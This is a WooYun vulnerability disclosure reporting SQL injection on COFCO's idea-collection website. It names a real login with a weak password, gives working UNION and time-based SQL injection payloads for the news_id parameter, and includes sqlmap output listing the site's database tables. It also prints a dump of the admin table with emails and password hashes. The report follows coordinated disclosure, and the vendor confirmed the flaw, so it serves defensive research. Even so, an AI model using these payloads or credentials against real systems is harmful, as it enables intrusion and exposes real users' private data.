当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126505

漏洞标题:中粮某站存在SQL注入

相关厂商:中粮集团有限公司

漏洞作者: 路人甲

提交时间:2015-07-14 09:35

修复时间:2015-08-29 15:06

公开时间:2015-08-29 15:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-14: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-25: 细节向核心白帽子及相关领域专家公开
2015-08-04: 细节向普通白帽子公开
2015-08-14: 细节向实习白帽子公开
2015-08-29: 细节向公众公开

简要描述:

RT

详细说明:

网址:http://idea.cofco.com/,中粮创意收集管理系统,用户名lxia和弱密码123456可进行登陆。
网址:http://idea.cofco.com/?m=News&a=newsdetails&news_id=118、
http://idea.cofco.com/?m=News&a=activity&news_id=108、http://idea.cofco.com/index.php/Idea_plat/idea_details/id/92484/inde,前两个news_id存在注入,后一个存在伪静态注入。

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: news_id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: news_id=-1831) UNION ALL SELECT NULL,NULL,CONCAT(0x3a67616a3a,0x4142504374584f66705a,0x3a776d693a),NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: news_id=105) AND SLEEP(5) AND (6137=6137
---
web application technology: Apache 2.2.24
back-end DBMS: MySQL >= 5.0.0
Database: chinafood
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| cofco_userinfo                        | 6410    |
| cofco_userlog                         | 3050    |
| cofco_department                      | 2125    |
| cofco_credit                          | 1607    |
| cofco_creative_log                    | 335     |
| cofco_message                         | 321     |
| cofco_creative                        | 177     |
| cofco_praise                          | 172     |
| cofco_vote                            | 154     |
| cofco_make_action                     | 137     |
| cofco_access                          | 85      |
| cofco_creative_status                 | 79      |
| cofco_collect                         | 75      |
| cofco_comment                         | 61      |
| cofco_node                            | 52      |
| cofco_feedback                        | 39      |
| cofco_creative_draft                  | 37      |
| cofco_admin_message                   | 22      |
| cofco_dangqiuserinfo                  | 14      |
| cofco_coverimglist                    | 11      |
| cofco_auditer                         | 9       |
| cofco_newscenter                      | 9       |
| cofco_role_user                       | 8       |
| cofco_write_userinfo                  | 8       |
| cofco_dangqi                          | 6       |
| cofco_intergal_bj                     | 6       |
| cofco_admin                           | 4       |
| cofco_lotteryinfo                     | 4       |
| cofco_role                            | 4       |
| cofco_goods                           | 3       |
| cofco_news_activity                   | 3       |
| cofco_orders                          | 3       |
| documents                             | 3       |
| cofco_lottery_user                    | 2       |
| cofco_news                            | 2       |
| cofco_version                         | 2       |
| cofco_andriodinfo                     | 1       |
| cofco_email_template                  | 1       |
| cofco_iosinfo                         | 1       |
| cofco_lottery_goods                   | 1       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 767     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 277     |
| SESSION_VARIABLES                     | 277     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 130     |
| COLLATIONS                            | 129     |
| PARTITIONS                            | 82      |
| TABLES                                | 82      |
| STATISTICS                            | 64      |
| KEY_COLUMN_USAGE                      | 50      |
| TABLE_CONSTRAINTS                     | 50      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 18      |
| TABLE_PRIVILEGES                      | 12      |
| PLUGINS                               | 7       |
| ENGINES                               | 5       |
| SCHEMATA                              | 3       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: news_id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: news_id=-1831) UNION ALL SELECT NULL,NULL,CONCAT(0x3a67616a3a,0x4142504374584f66705a,0x3a776d693a),NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: news_id=105) AND SLEEP(5) AND (6137=6137
---
web application technology: Apache 2.2.24
back-end DBMS: MySQL >= 5.0.0
Database: chinafood
Table: cofco_admin
[4 entries]
+-----+----------------------------------+--------------------+--------+--------------+------------+----------+-----------+
| aid | pwd                              | email              | status | remark       | `time`     | nickname | find_code |
+-----+----------------------------------+--------------------+--------+--------------+------------+----------+-----------+
| 1   | dd8d34ebd7ddaf48ccf14abbc0d5a4ba | admin@163.com      | 1      | 鎴戞槸瓒呯骇绠$悊鍛?鍝堝搱~~ | 1378706881 | 瓒呯骇绠$悊鍛?   | <blank>   |
| 16  | 7d1fa7fc2c5079a9758af35ecf1c4173 | dengmeiyan@163.com | 1      | 绠$悊鍛?         | 1388223174 | 绠$悊鍛?     | 2         |
| 23  | fdab0aeb573f2395c8fbd34306ccf94f | luyv@163.com       | 1      | <blank>      | 1390725529 | NULL     | NULL      |
| 22  | b6904ee5255db1bb7be5b760470b6914 | wangqixian@163.com | 1      | <blank>      | 1390725476 | NULL     | NULL      |
+-----+----------------------------------+--------------------+--------+--------------+------------+----------+-----------+


1.png

2.png

3.png

4.png

5.png

6.png

7.png

漏洞证明:

1.png

2.png

3.png

4.png

5.png

6.png

7.png

修复方案:

...

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-07-15 15:05

厂商回复:

非常感谢!

最新状态:

暂无